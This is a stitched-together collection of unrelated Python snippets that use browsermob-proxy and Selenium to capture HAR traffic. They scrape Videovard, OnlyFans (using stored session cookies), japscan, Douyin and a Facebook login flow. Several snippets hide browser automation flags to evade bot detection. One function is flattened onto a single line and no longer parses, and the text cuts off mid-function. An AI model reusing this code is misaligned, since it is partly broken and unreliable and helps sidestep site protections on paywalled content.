            self.driver.set_page_load_timeout(timeout)
            self.driver.get(url)
            # Scroll in increasing fractions of the page height so lazily
            # loaded resources are requested and end up in the HAR.
            self.driver.execute_script(
                "window.scrollTo(0, document.body.scrollHeight/5);")
            time.sleep(.5)  #wait for the page to load
            self.driver.execute_script(
                "window.scrollTo(0, document.body.scrollHeight/4);")
            time.sleep(.5)  #wait for the page to load
            self.driver.execute_script(
                "window.scrollTo(0, document.body.scrollHeight/3);")
            time.sleep(.5)  #wait for the page to load
            self.driver.execute_script(
                "window.scrollTo(0, document.body.scrollHeight/2);")
            time.sleep(.5)  #wait for the page to load
            self.driver.execute_script(
                "window.scrollTo(0, document.body.scrollHeight);")
            time.sleep(4)  #wait for the page to load
        except TimeoutException:
            print("Timeout")
            # Abort the pending load and continue with what we have.
            self.driver.find_element_by_tag_name("body").send_keys(
                Keys.CONTROL + Keys.ESCAPE)
        try:
            source = self.driver.page_source
            result = json.dumps(self.proxy.har, ensure_ascii=False)
            # HAR filename is the current time in milliseconds.
            with open(
                    self.harfilePath + "/" + str(int(time.time() * 1000.0)) +
                    ".har", "w") as harfile:
                harfile.write(result)
            return source
        except TimeoutException:
            print("Retrying, with a timeout of " + str(timeout + 5))
            return self.get(url, timeout=timeout + 5)

    def close(self):
        """Stop the proxy server and the browser, ignoring (but reporting)
        failures so one broken component doesn't block the other's cleanup."""
        try:
            self.server.stop()
        except Exception:
            print("Warning: Error stopping server")
            pass
        try:
            self.driver.quit()
        except Exception:
            print("Warning: Error stopping driver")
            pass
class performance(object):
    #create performance data
    # Python 2 helper: loads a URL through browsermob-proxy and dumps the HAR
    # plus the browser's window.performance timings to JSON files.

    def __init__(self, mob_path):
        #initialize
        # mob_path: path to the browsermob-proxy launcher binary.
        from datetime import datetime
        print "%s: Go "%(datetime.now())
        self.browser_mob = mob_path
        self.server = self.driver = self.proxy = None

    @staticmethod
    def __store_into_file(args,title, result):
        #store data collected into file
        # Writes <title>.json into args['path'] when given, else the cwd.
        if 'path' in args:
            har_file = open(args['path']+'/'+title + '.json', 'w')
        else:
            har_file = open(title + '.json', 'w')
        har_file.write(str(result))
        har_file.close()

    def __start_server(self):
        #prepare and start server
        self.server = Server(self.browser_mob)
        self.server.start()
        self.proxy = self.server.create_proxy()

    def __start_driver(self,args):
        #prepare and start driver
        # args['browser'] selects chrome (proxied via --proxy-server) or
        # firefox (proxied via the profile).
        #chromedriver
        if args['browser'] == 'chrome':
            print "Browser: Chrome"
            print "URL: {0}".format(args['url'])
            chromedriver = os.getenv("CHROMEDRIVER_PATH", "/chromedriver")
            os.environ["webdriver.chrome.driver"] = chromedriver
            # proxy.proxy is host:port; parsing without a scheme leaves the
            # whole string in .path.
            url = urlparse.urlparse (self.proxy.proxy).path
            chrome_options = webdriver.ChromeOptions()
            chrome_options.add_argument("--proxy-server={0}".format(url))
            chrome_options.add_argument("--no-sandbox")
            self.driver = webdriver.Chrome(chromedriver,chrome_options = chrome_options)
        #firefox
        if args['browser'] == 'firefox':
            print "Browser: Firefox"
            profile = webdriver.FirefoxProfile()
            profile.set_proxy(self.proxy.selenium_proxy())
            self.driver = webdriver.Firefox(firefox_profile=profile)

    def start_all(self,args):
        #start server and driver
        self.__start_server()
        self.__start_driver(args)

    def create_har(self,args):
        #start request and parse response
        # Records the HAR for args['url'] and stores 'har.json'/'perf.json'.
        self.proxy.new_har(args['url'], options={'captureHeaders': True})
        self.driver.get(args['url'])
        result = json.dumps(self.proxy.har, ensure_ascii=False)
        self.__store_into_file(args,'har', result)
        performance = json.dumps(self.driver.execute_script("return window.performance"), ensure_ascii=False)
        self.__store_into_file(args,'perf', performance)

    def stop_all(self):
        #stop server and driver
        from datetime import datetime
        print "%s: Finish"%(datetime.now())
        self.server.stop()
        self.driver.quit()
def _real_extract(self, url):
    """Extract a Videovard video by capturing its HLS master playlist.

    Allocates a browsermob-proxy (port from the class counter, under the
    class lock), records a HAR while Selenium clicks through the player's
    overlay/ad elements, pulls the master.m3u8 URL out of the HAR, fetches
    and parses it, and returns an info dict with the HLS formats.
    """
    try:
        # The whole extraction is serialized under the class lock.
        with VideovardIE._LOCK:
            self.report_extraction(url)
            videoid = self._match_id(url)
            while True:
                _server_port = 18080 + VideovardIE._NUM * 100
                _server = Server(
                    path=
                    "/Users/antoniotorres/Projects/async_downloader/browsermob-proxy-2.1.4/bin/browsermob-proxy",
                    options={'port': _server_port})
                try:
                    if _server._is_listening():
                        # Port taken: bump the counter, retry, cap at 25.
                        VideovardIE._NUM += 1
                        if VideovardIE._NUM == 25:
                            raise Exception("mobproxy max tries")
                    else:
                        _server.start({
                            "log_path": "/dev",
                            "log_file": "null"
                        })
                        self.to_screen(
                            f"[{url}] browsermob-proxy start OK on port {_server_port}"
                        )
                        VideovardIE._NUM += 1
                        break
                except Exception as e:
                    lines = traceback.format_exception(*sys.exc_info())
                    self.to_screen(
                        f'[{url}] {repr(e)} \n{"!!".join(lines)}')
                    if _server.process:
                        _server.stop()
                    raise ExtractorError(
                        f"[{url}] browsermob-proxy start error - {repr(e)}"
                    )
            _host = 'localhost'
            # Convention: the HAR proxy listens on server port + 1.
            _port = _server_port + 1
            _harproxy = _server.create_proxy({'port': _port})
            driver = self.get_driver(host=_host, port=_port)
            try:
                _harproxy.new_har(options={
                    'captureHeaders': True,
                    'captureContent': True
                },
                                  ref=f"har_{videoid}",
                                  title=f"har_{videoid}")
                # Use the /v/ (view) page rather than the /e/ (embed) page.
                self.send_multi_request(driver, url.replace('/e/', '/v/'))
                title = try_get(
                    self.wait_until(
                        driver, 60,
                        ec.presence_of_element_located(
                            (By.TAG_NAME, "h1"))), lambda x: x.text)
                vpl = self.wait_until(
                    driver, 60,
                    ec.presence_of_element_located((By.ID, "vplayer")))
                # Click the player to start playback; overlay/ad elements
                # ("kalamana", "rulezco") may intercept the click, so dismiss
                # them and try once more.
                for i in range(2):
                    try:
                        vpl.click()
                        self.wait_until(driver, 1)
                        vpl.click()
                        break
                    except Exception as e:
                        el_kal = self.wait_until(
                            driver, 60,
                            ec.presence_of_element_located(
                                (By.CSS_SELECTOR, "div.kalamana")))
                        if el_kal:
                            el_kal.click()
                            self.wait_until(driver, 1)
                        el_rul = self.wait_until(
                            driver, 60,
                            ec.presence_of_element_located(
                                (By.CSS_SELECTOR, "div.rulezco")))
                        if el_rul:
                            el_rul.click()
                            self.wait_until(driver, 1)
                        continue
                har = _harproxy.har
                m3u8_url = self.scan_for_request(har, f"har_{videoid}",
                                                 f"master.m3u8")
                if m3u8_url:
                    self.write_debug(f"[{url}] m3u8 url - {m3u8_url}")
                    # Fetch the playlist directly (no driver needed).
                    res = self.send_multi_request(None, m3u8_url)
                    if not res:
                        raise ExtractorError(f"[{url}] no m3u8 doc")
                    m3u8_doc = (res.content).decode('utf-8', 'replace')
                    self.write_debug(f"[{url}] \n{m3u8_doc}")
                    formats_m3u8, _ = self._parse_m3u8_formats_and_subtitles(
                        m3u8_doc,
                        m3u8_url,
                        ext="mp4",
                        entry_protocol='m3u8_native',
                        m3u8_id="hls")
                    if not formats_m3u8:
                        raise ExtractorError(
                            f"[{url}] Can't find any M3U8 format")
                    self._sort_formats(formats_m3u8)
                    return ({
                        "id": videoid,
                        "title": sanitize_filename(title, restricted=True),
                        "formats": formats_m3u8,
                        "ext": "mp4"
                    })
            except ExtractorError as e:
                raise
            except Exception as e:
                lines = traceback.format_exception(*sys.exc_info())
                self.to_screen(f'{repr(e)} \n{"!!".join(lines)}')
                raise ExtractorError(repr(e))
            finally:
                # Inner finally: proxy/server/driver are guaranteed bound here.
                _harproxy.close()
                _server.stop()
                self.rm_driver(driver)
    except Exception as e:
        lines = traceback.format_exception(*sys.exc_info())
        self.to_screen(f'{repr(e)} \n{"!!".join(lines)}')
        raise ExtractorError(repr(e))
def worker(self):
    """Collect japscan image URLs for the pages in self.urls_list.

    Drives a headless, proxied Chrome over every other page (even or odd
    indexes, depending on the total page count) and harvests .jpg/.png
    request URLs from the recorded HAR into self.urls_down.
    """
    # Set basic var for the function
    self.urls_down = []
    network_events = []
    URLS = self.urls_list
    page_nbr = len(self.urls_list) - 1
    path = os.getcwd()
    # Browsermob binaries location
    browsermobproxy_location = "{}/browsermob/browsermob-proxy".format(
        path)
    # Start browsermob server
    print("Proxy init...")
    server = Server(browsermobproxy_location)
    server.start()
    time.sleep(1)
    proxy = server.create_proxy()
    time.sleep(1)
    # Set option for the webdriver, automation detection from japscan, certificate, and headless
    chrome_path = "{}/chromedriver".format(path)
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_experimental_option("useAutomationExtension", False)
    chrome_options.add_experimental_option("excludeSwitches",
                                           ["enable-automation"])
    chrome_options.set_capability("acceptInsecureCerts", True)
    chrome_options.add_argument("--log-level=3")
    chrome_options.add_argument('--proxy-server=%s' % proxy.proxy)
    chrome_options.add_argument("--disable-blink-features")
    chrome_options.add_argument(
        "--disable-blink-features=AutomationControlled")
    chrome_options.add_argument("--headless")
    caps = DesiredCapabilities.CHROME
    driver = webdriver.Chrome(chrome_path,
                              desired_capabilities=caps,
                              options=chrome_options)
    print("Driver init...")
    # Do a while loop in case of timeout it happen sometimes
    while True:
        print("Fetch :")
        try:
            # Initiate the driver with low consumption website
            driver.set_page_load_timeout(30)
            driver.get('http://perdu.com/')
            # if the page number is even scrap only even page, since we can scrap the current page and the next page it's shorter
            if page_nbr % 2 == 0:
                for URL in tqdm(URLS[::2]):
                    network_events = []
                    proxy.new_har("urls")
                    driver.get(URL)
                    # Get the page logs
                    entries = proxy.har['log']["entries"]
                    for entry in entries:
                        if 'request' in entry.keys():
                            network_events.append(entry['request']['url'])
                    # Extract only the imges
                    matches = [
                        s for s in network_events
                        if ".jpg" in s and "japscan.co" in s
                        or ".png" in s and "japscan.co" in s
                    ]
                    # Drop background images.
                    matches = [x for x in matches if "bg." not in x]
                    # Add images Urls to a list
                    for match in matches:
                        self.urls_down.append(match)
            # Same operation if page number is odd
            if page_nbr % 2 != 0:
                for URL in tqdm(URLS[1::2]):
                    network_events = []
                    proxy.new_har("urls")
                    driver.get(URL)
                    entries = proxy.har['log']["entries"]
                    for entry in entries:
                        if 'request' in entry.keys():
                            network_events.append(entry['request']['url'])
                    matches = [
                        s for s in network_events
                        if ".jpg" in s and "japscan.co" in s
                        or ".png" in s and "japscan.co" in s
                    ]
                    matches = [x for x in matches if "bg." not in x]
                    for match in matches:
                        self.urls_down.append(match)
            break
        except TimeoutException as ex:
            print("Timeout, retry" + str(ex))
            # NOTE(review): the driver is quit here but never recreated, so
            # the retry iteration reuses a dead session and driver.get()
            # will fail — likely a bug; confirm and recreate the driver (or
            # don't quit it) on retry.
            driver.quit()
            continue
    # Remove duplicate
    self.urls_down = list(dict.fromkeys(self.urls_down))
    # Stop the server and the driver
    server.stop()
    driver.quit()
    # Return image url list
    return
def get_signature_url(user_url): try: # 代理服务 server = Server(proxy_file) server.start() proxy = server.create_proxy() options = webdriver.ChromeOptions() # ChromeOptions() options.add_argument("--proxy-server={0}".format(proxy.proxy)) options.add_argument('--disable-gpu') # options.add_argument('--dump-dom') # options.add_argument('--disable-web-security') # options.headless = True options.add_argument('lang=zh_CN.UTF-8') options.add_argument("user-agent=" + ua) options.add_argument('accept=' + accept[0]) options.add_argument("accept-language=" + accept_language[0]) options.add_argument('accept-encoding="gzip, deflate, br"') options.add_argument("upgrade-insecure-requests=1") options.add_argument('cache-control="max-age=0"') options.add_experimental_option('excludeSwitches', ['enable-automation']) # 爬虫关键字 # webdriver.Firefox(options,executable_path=fireFox_driver) # # webdriver.Firefox(firefox_options=chrome_options)# driver = webdriver.Chrome(options=options) proxy.new_har("douyin", options={'captureHeaders': True, 'captureContent': True}) logger.info("原始URL {}".format(url)) driver.set_network_conditions( offline=False, latency=5, # additional latency (ms) download_throughput=500 * 1024, # maximal throughput upload_throughput=500 * 1024) # maximal throughput driver.get(user_url) network = driver.get_network_conditions() print(network) time.sleep(3) result = proxy.har # 获取HAR # print(result) for entry in result['log']['entries']: _url = entry['request']['url'] # print(_url) # # 根据URL找到数据接口,这里要找的是 http://git.liuyanlin.cn/get_ht_list 这个接口 if "_signature" in _url: logger.info("获取到用户第一个数据请求接口------>>>\n{}".format(_url)) driver.get(_url) cookies = driver.get_cookies() time.sleep(3) print(driver.page_source) print(cookies) return _url # print(_url) # _response = entry['response'] # _content = _response['content'] # 获取接口返回内容 # print(_content) except Exception as e: logger.exception(e) pass finally: server.stop() driver.quit()
def _real_extract(self, url):
    """Extract an OnlyFans playlist for the account/mode encoded in `url`.

    Starts a dedicated BrowserMob proxy instance, drives a Selenium session
    through it, records the site's XHR traffic into a HAR, and mines the HAR
    for the JSON payloads that describe the account's videos (or chat media).
    Entries are deduplicated by video id, keeping the longer-duration variant.

    Raises:
        ExtractorError: on a 404 profile, a missing chat user id, or when no
            entries could be collected.
    """
    try:
        self.report_extraction(url)
        # Serialize proxy-server startup across threads: probe ports
        # 18080, 18180, ... until a free one is found (max 25 attempts).
        with OnlyFansPostIE._LOCK:
            while True:
                _server_port = 18080 + 100 * OnlyFansPostIE._NUM
                _server = Server(
                    path="/Users/antoniotorres/Projects/async_downloader/browsermob-proxy-2.1.4/bin/browsermob-proxy",
                    options={'port': _server_port})
                if _server._is_listening():
                    OnlyFansPostIE._NUM += 1
                    if OnlyFansPostIE._NUM == 25:
                        raise Exception("mobproxy max tries")
                else:
                    # Discard the proxy server's own logging.
                    _server.start({'log_path': '/dev', 'log_file': 'null'})
                    OnlyFansPostIE._NUM += 1
                    break
        _host = 'localhost'
        _port = _server_port + 1  # HAR proxy listens one port above the server
        _harproxy = _server.create_proxy({'port': _port})
        # NOTE(review): get_driver is called twice in a row and the first
        # driver is never quit — looks unintentional; confirm before removing.
        driver = self.get_driver(host=_host, port=_port)
        driver = self.get_driver(host=_host, port=_port)
        self.send_driver_request(driver, self._SITE_URL)
        for cookie in OnlyFansPlaylistIE._COOKIES:
            driver.add_cookie(cookie)
        account, mode = re.search(self._VALID_URL, url).group("account", "mode")
        if not mode:
            mode = "latest"
        entries = {}
        if mode in ("all", "latest", "favorites", "tips"):
            self.send_driver_request(driver, f"{self._SITE_URL}/{account}")
            res = self.wait_until(driver, 60, error404_or_found())
            if not res or res[0] == "error404":
                raise ExtractorError(
                    "Error 404: User profile doesnt exists")
            _url = f"{self._SITE_URL}/{account}/videos{self._MODE_DICT[mode]}"
            _harproxy.new_har(options={
                'captureHeaders': False,
                'captureContent': True
            },
                              ref=f"har_{account}_{mode}",
                              title=f"har_{account}_{mode}")
            self.send_driver_request(driver, _url)
            self.wait_until(
                driver, 60,
                ec.presence_of_all_elements_located(
                    (By.CLASS_NAME, "b-photos__item.m-video-item")))
            # NOTE(review): `("latest")` is a plain string, not a 1-tuple, so
            # this is a substring test; it works for mode == "latest" but also
            # matches substrings such as "test" — confirm intent.
            if mode in ("latest"):
                har = _harproxy.har
                data_json = self.scan_for_request(har, f"har_{account}_{mode}",
                                                  "posts/videos?")
                if data_json:
                    self.write_debug(data_json)
                    list_json = data_json.get('list')
                    if list_json:
                        for info_json in list_json:
                            _entry = self._extract_from_json(
                                info_json, user_profile=account)
                            if _entry:
                                for _video in _entry:
                                    # Dedup by id, keep the longer variant.
                                    if not _video['id'] in entries.keys():
                                        entries[_video['id']] = _video
                                    else:
                                        if _video.get(
                                                'duration', 1) > entries[
                                                    _video['id']].get(
                                                        'duration', 0):
                                            entries[_video['id']] = _video
            else:
                # lets scroll down in the videos pages till the end
                self.wait_until(driver, 600, scroll(10))
                har = _harproxy.har
                _reg_str = r'/api2/v2/users/\d+/posts/videos\?'
                data_json = self.scan_for_all_requests(
                    har, f"har_{account}_{mode}", _reg_str)
                if data_json:
                    self.write_debug(data_json)
                    list_json = []
                    for el in data_json:
                        list_json += el.get('list')
                    self.write_debug(list_json)
                    for info_json in list_json:
                        _entry = self._extract_from_json(
                            info_json, user_profile=account)
                        if _entry:
                            for _video in _entry:
                                # Dedup by id, keep the longer variant.
                                if not _video['id'] in entries.keys():
                                    entries[_video['id']] = _video
                                else:
                                    if _video.get(
                                            'duration', 1) > entries[_video['id']].get(
                                                'duration', 0):
                                        entries[_video['id']] = _video
        elif mode in ("chat"):
            _harproxy.new_har(options={
                'captureHeaders': False,
                'captureContent': True
            },
                              ref=f"har_{account}_{mode}",
                              title=f"har_{account}_{mode}")
            _url = f"{self._SITE_URL}/{account}"
            self.send_driver_request(driver, _url)
            res = self.wait_until(driver, 60, error404_or_found())
            if not res or res[0] == "error404":
                raise ExtractorError("User profile doesnt exists")
            har = _harproxy.har
            # The numeric user id is needed to build the chat-room URL.
            data_json = self.scan_for_request(har, f"har_{account}_{mode}",
                                              f"users/{account}")
            #self.to_screen(data_json)
            userid = try_get(data_json, lambda x: x['id'])
            if not userid:
                raise ExtractorError("couldnt get id user for chat room")
            url_chat = f"https://onlyfans.com/my/chats/chat/{userid}/"
            self.to_screen(url_chat)
            self.send_driver_request(driver, url_chat)
            # init start of chat is to be at the end, with all the previous
            # messages above. Lets scroll up to the start of the chat
            el_chat_scroll = self.wait_until(
                driver, 60,
                ec.presence_of_element_located((
                    By.CSS_SELECTOR,
                    "div.b-chats__scrollbar.m-custom-scrollbar.b-chat__messages.m-native-custom-scrollbar.m-scrollbar-y.m-scroll-behavior-auto"
                )))
            self.wait_until(driver, 1)
            el_chat_scroll.send_keys(Keys.HOME)
            self.wait_until(driver, 5)
            har = _harproxy.har
            _reg_str = r'/api2/v2/chats/\d+/messages'
            data_json = self.scan_for_all_requests(har, f"har_{account}_{mode}",
                                                   _reg_str)
            if data_json:
                self.write_debug(data_json)
                list_json = []
                for el in data_json:
                    list_json += el.get('list')
                for info_json in list_json:
                    _entry = self._extract_from_json(info_json,
                                                     user_profile=account)
                    if _entry:
                        for _video in _entry:
                            # Dedup by id, keep the longer variant.
                            if not _video['id'] in entries.keys():
                                entries[_video['id']] = _video
                            else:
                                if _video.get(
                                        'duration', 1) > entries[_video['id']].get(
                                            'duration', 0):
                                    entries[_video['id']] = _video
        if entries:
            return self.playlist_result(list(entries.values()),
                                        "Onlyfans:" + account,
                                        "Onlyfans:" + account)
        else:
            raise ExtractorError("no entries")
    except ExtractorError as e:
        raise
    except Exception as e:
        lines = traceback.format_exception(*sys.exc_info())
        self.to_screen(f'{repr(e)} \n{"!!".join(lines)}')
        raise ExtractorError(repr(e))
    finally:
        # NOTE(review): if setup failed early, _harproxy/_server/driver may be
        # unbound here and this finally raises NameError — confirm and guard.
        _harproxy.close()
        _server.stop()
        self.rm_driver(driver)
def retrieve_har():
    """Record a HAR for the global `url` via BrowserMob + Firefox and save it.

    Python 2 code. Relies on module globals: `har_name`, `har_save_path`,
    `path` (browsermob binary), `ff_profile` and `url`. Tries to click the
    embedded 'vplayer' video element (twice) so the media request appears in
    the HAR, then dumps the HAR as JSON to `<har_save_path>/<har_name>.har`.
    """
    print "Retrieving .har file using generated url..."
    har_name_ex = har_name + ".har"
    complete_har_path = os.path.join(har_save_path, har_name_ex)
    # Magic starts here: proxy + proxied Firefox session.
    server = Server(path)
    server.start()
    proxy = server.create_proxy()
    profile = webdriver.FirefoxProfile(ff_profile)
    profile.set_proxy(proxy.selenium_proxy())
    driver = webdriver.Firefox(firefox_profile=profile)
    # Broken script to load the page in Google Chrome instead of Mozilla Firefox
    """
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_argument("--proxy-server={0}".format(proxy.proxy))
    driver = webdriver.Chrome(chrome_options = chrome_options)
    """
    proxy.new_har(har_name, options={'captureHeaders': True})
    driver.get(url)
    # Trying to click 'vplayer'
    try:
        driver.switch_to.frame(0)
        # Clicking the video automagically
        jwplayer = driver.find_element_by_name('vplayer')
        jwplayer.click()
    # And if that somehow doesn't work
    except Exception:
        print "Couldn't click player!"
        print "Trying again in 5 seconds..."
        time.sleep(5)
        # Try it again...
        try:
            driver.switch_to.frame(0)
            # Clicking the video automagically (again)
            jwplayer = driver.find_element_by_name('vplayer')
            jwplayer.click()
        # And if that doesn't work either: give up, clean up, exit the process.
        except Exception:
            print "Not able to click the video player"
            # Stop the server and the driver
            server.stop()
            driver.quit()
            time.sleep(3)
            sys.exit()
    time.sleep(1)
    # Exporting the wanted .har file
    result = json.dumps(proxy.har, ensure_ascii=False, indent=4)  # indent=4 puts the .har file on seperated lines
    # And write it to an automatically created file
    har_file = open(complete_har_path, 'w')
    har_file.write(str(result))
    har_file.close()
    # Stop the server and the driver
    server.stop()
    driver.quit()
def _get_videos_from_subs(self, url):
    """Collect all video entries from a subscribed account's `/videos` page.

    Starts a dedicated BrowserMob proxy, drives a Selenium session through
    it, records the page's XHR traffic into a HAR, and extracts the entries
    from the "posts/videos?" JSON response. Entries are deduplicated by
    video id, keeping the longer-duration variant.

    Returns:
        list: The deduplicated video entry dicts.

    Raises:
        ExtractorError: when the profile 404s or no entries are found.
    """
    _server = None
    _harproxy = None
    driver = None
    try:
        _url_videos = f"{url}/videos"
        self.report_extraction(_url_videos)
        # Serialize port allocation across threads: each instance gets its
        # own server port (18080, 18180, ...).
        with OnlyFansActSubslistIE._LOCK:
            _server_port = 18080 + 100 * OnlyFansActSubslistIE._NUM
            OnlyFansActSubslistIE._NUM += 1
            _server = Server(
                path="/Users/antoniotorres/Projects/async_downloader/browsermob-proxy-2.1.4/bin/browsermob-proxy",
                options={'port': _server_port})
            # Discard the proxy server's own logging.
            _server.start({'log_path': '/dev', 'log_file': 'null'})
        _host = 'localhost'  # FIX: was assigned twice in a row
        _port = _server_port + 1  # HAR proxy listens one port above the server
        _harproxy = _server.create_proxy({'port': _port})
        driver = self.get_driver(host=_host, port=_port, msg=f'[{_url_videos}]')
        self.send_driver_request(driver, self._SITE_URL)
        for cookie in OnlyFansActSubslistIE._COOKIES:
            driver.add_cookie(cookie)
        self.send_driver_request(driver, url)
        res = self.wait_until(driver, 60, error404_or_found())
        if not res or res[0] == "error404":
            raise ExtractorError(
                f"[{_url_videos}] User profile doesnt exists")
        account = url.split("/")[-1]
        _harproxy.new_har(options={
            'captureHeaders': False,
            'captureContent': True
        },
                          ref=f"har_actsubs_{account}",
                          title=f"har_actsubs_{account}")
        self.send_driver_request(driver, _url_videos)
        self.wait_until(
            driver, 60,
            ec.presence_of_all_elements_located(
                (By.CLASS_NAME, "b-photos__item.m-video-item")))
        har = _harproxy.har
        data_json = self.scan_for_request(har, f"har_actsubs_{account}",
                                          "posts/videos?")
        entries = {}
        if data_json:
            self.write_debug(data_json)
            list_json = data_json.get('list')
            if list_json:
                for info_json in list_json:
                    _entry = self._extract_from_json(info_json,
                                                     user_profile=account)
                    if _entry:
                        for _video in _entry:
                            # Dedup by id, keep the longer variant.
                            if not _video['id'] in entries.keys():
                                entries[_video['id']] = _video
                            elif _video.get('duration', 1) > entries[
                                    _video['id']].get('duration', 0):
                                entries[_video['id']] = _video
        if not entries:
            raise ExtractorError(f"[{_url_videos}] no entries")
        return list(entries.values())
    except ExtractorError as e:
        raise
    except Exception as e:
        lines = traceback.format_exception(*sys.exc_info())
        self.to_screen(f'[{_url_videos}] {repr(e)} \n{"!!".join(lines)}')
        raise ExtractorError(f'[{_url_videos}] {repr(e)}')
    finally:
        # Guarded cleanup: any of these may be unset if setup failed early;
        # an unguarded call would raise NameError and mask the real error.
        if _harproxy is not None:
            _harproxy.close()
        if _server is not None:
            _server.stop()
        if driver is not None:
            self.rm_driver(driver)
class HarTrapper:
    """Records N HAR captures of a Facebook 'Pages' click flow as CSV files.

    Wires together a BrowserMob proxy and a Selenium Chrome session, logs in
    to Facebook with credentials from config.ini, then repeatedly clicks the
    configured PAGE link, flattening each HAR recording into a pandas
    DataFrame that is exported to CSV.
    """

    def __init__(self):
        # Setup settings from config file.
        config = configparser.ConfigParser()
        config.read('config.ini')
        self.PAGE = config['CAPTURE_N_HAR_FILES']['PAGE']
        self.NAME = config['CAPTURE_N_HAR_FILES']['NAME']
        self.URL = config['CAPTURE_N_HAR_FILES']['URL']
        self.PATH = config['CAPTURE_N_HAR_FILES']['PATH']
        self.USERNAME = config['CAPTURE_N_HAR_FILES']['USERNAME']
        self.PASSWORD = config['CAPTURE_N_HAR_FILES']['PASSWORD']
        # Number of capture rounds (stored as a string, cast with int() later).
        self.N = config['CAPTURE_N_HAR_FILES']['N']
        self.df = None  # last capture as a DataFrame (set by build_df)
        self.server = Server(config['HAR']['SERVER_PATH'])
        self.server.start()
        self.proxy = self._start_proxy()
        self.driver = self._start_chrome_driver()

    def capture_n_har_files(self):
        """Run the whole capture session N times and export one CSV per run.

        Flow: open URL, log in and navigate to the 'Pages' section, wait for
        the 'c_user' session cookie, then for each round: clear non-session
        cookies, start a fresh HAR, perform the page click (page_func), build
        a DataFrame from the HAR and export it to '<PATH>/_<i>.csv'.
        Finally quits the driver and stops the proxy server.
        """
        print('Working...')
        # Enter facebook.com
        self.driver.get(self.URL)
        # Go to the 'pages' page in facebook.com
        self.go_to_pages()
        # Wait for 'c_user' cookie (present once logged in).
        while self.driver.get_cookie('c_user') is None:
            print('No c_user.')
            self.driver.implicitly_wait(2)
        # Click on the PAGE and close the tab N times.
        for i in range(int(self.N)):
            self.clear_cache()
            self.proxy.new_har(self.NAME)
            self.page_func()
            self.build_df()
            self.export_df(self.PATH + f'/_{i}.csv')
            print(f'{i}')
        # Finish session.
        self.driver.quit()
        self.server.stop()

    def _start_proxy(self):
        """Start a new proxy server to capture har data.

        Retries create_proxy until the connection succeeds.

        :return: The new server proxy.
        """
        run = True
        while run:
            try:
                proxy = self.server.create_proxy()
                run = False
            except requests.exceptions.ConnectionError as e:
                print(e)
        return proxy

    def _start_chrome_driver(self) -> webdriver:
        """Using Selenium start the google chrome browser headless.

        All the browser requests and responses (har data) are routed through
        the BrowsermobProxy proxy server for recording.

        :return: Google chrome driver object.
        """
        chrome_options = webdriver.ChromeOptions()
        # Block browser notification pop-ups.
        prefs = {"profile.default_content_setting_values.notifications": 2}
        chrome_options.add_experimental_option("prefs", prefs)
        chrome_options.set_capability('proxy', {'httpProxy': f'{self.proxy.proxy}',
                                                'noProxy': '',
                                                'proxyType': 'manual',
                                                'sslProxy': f'{self.proxy.proxy}'})
        # chrome_options.add_argument("--headless")
        driver = webdriver.Chrome(chrome_options=chrome_options)
        driver.set_page_load_timeout(999)
        driver.delete_all_cookies()
        return driver

    def clear_cache(self):
        """Delete all cookies except the Facebook session ones (c_user, xs)."""
        cookies = self.driver.get_cookies()
        for cookie in cookies:
            name = cookie['name']
            if name == 'c_user' or name == 'xs':
                pass
            else:
                self.driver.delete_cookie(name)

    def export_har(self):
        """Export the har recording to a json file."""
        with open('./har_fit.json', 'w') as file:
            json.dump(self.proxy.har, file)

    def export_df(self, path):
        """Export the instance DataFrame to a csv file.

        :param path: Export file path.
        """
        self.df.to_csv(path)

    def go_to_pages(self):
        """Log in to Facebook and click through to the 'Pages' section.

        Retries each stage in a loop until the expected elements are present,
        logging (but otherwise ignoring) the common Selenium exceptions.
        """
        timeout = 5
        email_xpath = '//input[@id="email"] | //input[@name="email"]'
        pass_xpath = '//input[@id="pass"] | //input[@name="pass"]'
        login_xpath = '//input[@value="Log In"] | //button[@name="login"]'
        # Wait until the whole login form is present.
        run = True
        while run:
            try:
                WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located((By.XPATH, email_xpath)))
                WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located((By.XPATH, login_xpath)))
                WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located((By.XPATH, pass_xpath)))
                run = False
            except selenium.common.exceptions.NoSuchElementException:
                print('Login NoSuchElementException.')
            except selenium.common.exceptions.TimeoutException:
                print('Login TimeoutException.')
            except selenium.common.exceptions.ElementNotInteractableException:
                print('Login ElementNotInteractableException.')
        # Fill in credentials and submit.
        self.driver.find_element_by_xpath(email_xpath).send_keys(self.USERNAME)
        self.driver.find_element_by_xpath(pass_xpath).send_keys(self.PASSWORD)
        self.driver.find_element_by_xpath(login_xpath).click()
        # Wait for and click the 'Pages' navigation entry.
        run = True
        while run:
            try:
                WebDriverWait(self.driver, timeout).until(
                    EC.presence_of_element_located((By.XPATH, '//div[text()="Pages"]')))
                self.driver.find_element_by_xpath('//div[text()="Pages"]').click()
                run = False
            except selenium.common.exceptions.NoSuchElementException:
                print('Login NoSuchElementException.')
            except selenium.common.exceptions.TimeoutException:
                print('Login TimeoutException.')
            except selenium.common.exceptions.ElementNotInteractableException:
                print('ElementNotInteractableException')

    def page_func(self):
        """Click 'Liked Pages', open the configured PAGE, then close its tab.

        Each stage retries until the element is present; the new tab is
        closed and focus is returned to the original 'pages' window.
        """
        timeout = 5
        liked_xpath = '//*[text() = "Liked Pages"]'
        page_xpath = '//span[text()="' + self.PAGE + '"]'
        home_xpath = '//a[text()="Home"]'  # NOTE(review): unused — confirm and remove
        # Make sure all elements exist on page before moving on.
        pages_window = self.driver.current_window_handle
        run = True
        while run:
            try:
                WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located((By.XPATH, liked_xpath)))
                self.driver.find_element_by_xpath(liked_xpath).click()
                run = False
            except selenium.common.exceptions.NoSuchElementException:
                print('Login NoSuchElementException.')
            except selenium.common.exceptions.TimeoutException:
                print('Login TimeoutException.')
            except selenium.common.exceptions.ElementNotInteractableException:
                print('ElementNotInteractableException')
        run = True
        while run:
            try:
                WebDriverWait(self.driver, timeout).until(EC.presence_of_element_located((By.XPATH, page_xpath)))
                self.driver.find_element_by_xpath(page_xpath).click()
                run = False
            except selenium.common.exceptions.NoSuchElementException:
                print('Login NoSuchElementException.')
            except selenium.common.exceptions.TimeoutException:
                print('Login TimeoutException.')
            except selenium.common.exceptions.ElementNotInteractableException:
                print('ElementNotInteractableException')
        # Close the tab the page opened and return to the original window.
        run = True
        while run:
            try:
